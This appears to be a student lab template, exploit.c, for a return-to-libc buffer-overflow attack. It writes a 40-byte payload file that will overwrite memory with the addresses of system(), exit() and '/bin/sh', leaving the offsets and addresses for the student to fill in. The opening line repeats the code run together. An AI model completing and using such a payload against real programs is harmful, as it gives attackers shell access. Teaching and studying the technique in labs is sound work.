/* exploit.c */#include <stdlib.h>#include <stdio.h>#include <string.h>i

1. /* exploit.c */
2. #include <stdlib.h>
3. #include <stdio.h>
4. #include <string.h>
5. int main(int argc, char **argv)
6. {
7. char buf[40];
8. FILE *badfile;
9. badfile = fopen("./badfile", "w");
10. /* You need to decide the addresses and
11. the values for X, Y, Z. The order of the following
12. three statements does not imply the order of X, Y, Z.
13. Actually, we intentionally scrambled the order. */
14. *(long *) &buf[X] = some address ; // "/bin/sh" ✰
15. *(long *) &buf[Y] = some address ; // system() ✰
16. *(long *) &buf[Z] = some address ; // exit() ✰
17. fwrite(buf, sizeof(buf), 1, badfile);
18. fclose(badfile);
19. }